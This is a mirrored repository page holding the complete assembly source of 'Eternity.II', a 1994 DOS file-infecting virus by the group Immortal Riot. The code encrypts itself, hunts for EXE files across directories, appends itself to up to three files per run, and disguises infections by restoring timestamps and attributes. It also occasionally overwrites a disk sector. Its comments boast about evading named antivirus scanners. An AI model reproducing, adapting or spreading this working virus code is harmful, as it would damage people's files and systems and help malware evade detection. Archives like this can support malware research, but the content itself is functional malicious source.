mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
4b9382ddbc
push
276 lines
6.0 KiB
NASM
276 lines
6.0 KiB
NASM
; -Eternity.II-
|
||
; "Created by Immortal Riot's destructive development team"
|
||
; (c) '94 The Unforgiven/Immortal Riot
|
||
;
|
||
; "If this virus survive into eternity, I'll live forever"
|
||
; or
|
||
; "Nothing last forever"
|
||
;
|
||
; Notes:
|
||
; F-Prot, Scan, TBAV, Findviru, can't find shits of this virus.
|
||
;
|
||
; Disclaimer:
|
||
; If this virus harms your computer and you kill yourself,
|
||
; I'll not attend on nor pay for your funeral.
|
||
;
|
||
; Dedication:
|
||
; I dedicate this virus to all members of Dia Psalma for all
|
||
; the ideoligical inspiration I've gained from listening on
|
||
; their music as well as talking with them.
|
||
|
||
.model tiny
|
||
.radix 16
|
||
.code
|
||
|
||
Virus_Lenght EQU Virus_End-Virus_Start
|
||
org 100
|
||
|
||
Virus_Start:
|
||
xchg ax, ax ; A nop to fill out the virus
|
||
mov ax,0fa01h ; to be exactly 600 bytes!
|
||
mov dx,5945h
|
||
int 16h
|
||
|
||
call Get_delta ; Get the delta-offset!
|
||
Get_delta:
|
||
pop bp
|
||
sub bp,Get_Delta-Virus_Start
|
||
|
||
call encrypt_decrypt ; Decrypt the virus
|
||
jmp short encryption_start ; then continue..
|
||
|
||
write_virus:
|
||
call encrypt_decrypt ; Encrypt the virus
|
||
mov ah,40
|
||
mov cx,Virus_Lenght
|
||
mov dx,bp
|
||
int 21
|
||
call encrypt_decrypt ; Decrypt it again
|
||
ret
|
||
|
||
encryption_value dw 0
|
||
encrypt_decrypt:
|
||
lea si,cs:[bp+encryption_start-virus_start]
|
||
mov cx,(end_of_virus-encryption_start+1)/2
|
||
mov dx,word ptr cs:[bp+encryption_value-virus_start]
|
||
|
||
Xor_LoopY:
|
||
xor word ptr cs:[si],dx
|
||
inc si
|
||
inc si
|
||
loop Xor_LoopY
|
||
ret
|
||
|
||
encryption_start: ; Heuristic, beat this!
|
||
mov ax,es
|
||
add ax,10
|
||
add ax,cs:[bp+Exe_header-Virus_Start+16]
|
||
push ax
|
||
push cs:[bp+Exe_header-Virus_Start+14]
|
||
|
||
push ds
|
||
push cs
|
||
pop ds
|
||
|
||
mov ah,1a ; Set the DTA
|
||
lea dx,[bp+Own_dta-virus_start]
|
||
int 21
|
||
|
||
One_Percent:
|
||
mov ah,2ch ; 1%
|
||
int 21h
|
||
cmp dl,0
|
||
jne get_drive
|
||
|
||
Cruel: ; God what I hate that
|
||
mov al,2h ; eskimoe!
|
||
mov cx,1
|
||
lea bx,v_name
|
||
cwd
|
||
int 26h
|
||
|
||
Get_drive: ; Current drive
|
||
mov ah,19h
|
||
int 21h
|
||
cmp al,2 ; A: or B:?
|
||
jae get_dir
|
||
jmp restore_dir ; Yep, then don't infect
|
||
; other files that run!
|
||
Get_Dir:
|
||
mov ah,47
|
||
xor dl,dl
|
||
lea si,[bp+dir-virus_start]
|
||
int 21
|
||
|
||
Di_Counter:
|
||
xor di,di ; Infection counter=0
|
||
; will be inc after each infection!
|
||
|
||
_4EH:
|
||
mov ah,4e ; Bummer..
|
||
|
||
Loop_Files:
|
||
lea dx,[bp+file_match-virus_start]
|
||
int 21
|
||
|
||
jnc clear_attribs ; We did find a file!
|
||
; Happy Happy, joy joy!
|
||
Dot_Dott:
|
||
lea dx,[bp+dot_dot-virus_start] ; Ah, the same old
|
||
mov ah,3bh ; dot-dot-routine again!
|
||
int 21h
|
||
|
||
jnc not_root ; No error!
|
||
jmp no_victim_found ; No more files in ..
|
||
|
||
not_root:
|
||
mov ah,4e ; Find first file
|
||
jmp short Loop_Files ; in the new directory
|
||
|
||
Clear_attribs: ; Clear file-attrib
|
||
mov ax,4301h
|
||
xor cx,cx
|
||
lea dx,[bp+own_dta-virus_start+1eh] ; 1eh=filename in DTA-aera
|
||
int 21h
|
||
|
||
Open_File:
|
||
mov ax,3d02 ; Open file in read/write mode
|
||
mov dx,Own_dta-Virus_Start+1e ; Yep, it's still 1eh in DTA!
|
||
add dx,bp ; bummer!
|
||
int 21
|
||
|
||
jnc read_File ; No error, then read the file!
|
||
jmp cant_open_file ; Hrm?!
|
||
|
||
v_name db "Eternity_II" ; Virus name!
|
||
|
||
|
||
Read_File:
|
||
xchg ax,bx ;File handle in bx
|
||
|
||
mov ah,3f ;Read file - 28 bytes
|
||
mov cx,1c ;to EXE_header (1ch)
|
||
lea dx,[bp+exe_header-virus_start]
|
||
int 21
|
||
|
||
jnc no_error ; It worked (duh)
|
||
jmp read_error ; Hrm?!
|
||
|
||
no_error:
|
||
cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
|
||
jnz no_exe
|
||
cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
|
||
jz infected
|
||
|
||
mov al,2 ; File pointer
|
||
call F_Ptr ; to end of file
|
||
|
||
push dx
|
||
push ax
|
||
|
||
Random:
|
||
mov ah,2ch ; Yah. Nearly polymorfic?
|
||
int 21h ; Oh well :-).
|
||
add dl,dh
|
||
jz random
|
||
mov word ptr cs:[bp+encryption_value-virus_start],dx
|
||
|
||
call write_virus ; Write encrypted copy
|
||
|
||
mov al,2 ; File pointer to end of file
|
||
Call F_Ptr
|
||
|
||
mov cx,200 ; bummer..
|
||
div cx
|
||
inc ax
|
||
mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
|
||
mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax
|
||
|
||
pop ax
|
||
pop dx
|
||
|
||
mov cx,10
|
||
div cx
|
||
sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
|
||
mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
|
||
mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
|
||
mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'
|
||
|
||
mov al,0 ; File pointer to top of file
|
||
call F_Ptr
|
||
|
||
mov ah,40 ; Write header
|
||
mov cx,1c
|
||
lea dx,[bp+exe_header-virus_start]
|
||
int 21
|
||
|
||
jc write_error ; Hrm!?
|
||
|
||
no_exe:
|
||
jmp short Restore_Time_Date
|
||
|
||
infected: ; Decrease infection counter
|
||
dec di ; with one
|
||
|
||
Restore_Time_Date: ; Nearly stealth?
|
||
lea si,[bp+own_dta-virus_start+16h] ; Oh well :-).
|
||
mov cx,word ptr [si]
|
||
mov dx,word ptr [si+2]
|
||
mov ax,5701h
|
||
int 21h
|
||
|
||
Close_File: ; Close the file
|
||
mov ah,3e
|
||
int 21
|
||
|
||
Set_Back_Attribs: ; Stealth-bomber!
|
||
mov ax,4301h
|
||
xor ch,ch
|
||
lea bx,[bp+own_dta-virus_start+15h]
|
||
mov cl,[bx]
|
||
lea dx,[bp+own_dta-virus_start+1eh]
|
||
int 21h
|
||
|
||
Sick_or_EXE:
|
||
mov ah,4f ; 4fh=find next file
|
||
inc di
|
||
cmp di,3 ; Infected three files?
|
||
jae finnished_infection ; Yep!
|
||
jmp Loop_Files ; Nah!
|
||
|
||
F_Ptr: ; Since we're using
|
||
mov ah,42 ; this routine
|
||
xor cx,cx ; three times,
|
||
cwd ; calling this
|
||
int 21 ; will save us
|
||
ret ; some bytes
|
||
|
||
write_error: ; For no use in this virus,
|
||
read_error: ; but if something screws
|
||
cant_open_file: ; up, add 09/i21h functions,
|
||
no_victim_found: ; and test what didn't work.
|
||
finnished_infection: ;
|
||
|
||
Restore_Dir: ; More stealth..
|
||
lea dx,[bp+dir-virus_start]
|
||
mov ah,3bh
|
||
int 21
|
||
|
||
quit: ; Return to original program
|
||
pop ds
|
||
retf
|
||
|
||
groupdb db "(c) '94 The Unforgiven/Immortal Riot" ; That's moi..
|
||
|
||
dot_dot db '..',0 ; Another directory
|
||
file_match db '*.EXE',0 ; Infect <20>m all!
|
||
|
||
Exe_header db 16 DUP(0)
|
||
dw 0fff0
|
||
db 4 DUP(0)
|
||
Own_Dta db 02bh DUP(0)
|
||
dir db 65 dup (?) ; Really really stupid!
|
||
|
||
Virus_End EQU $
|
||
end_of_virus:
|
||
end Virus_Start |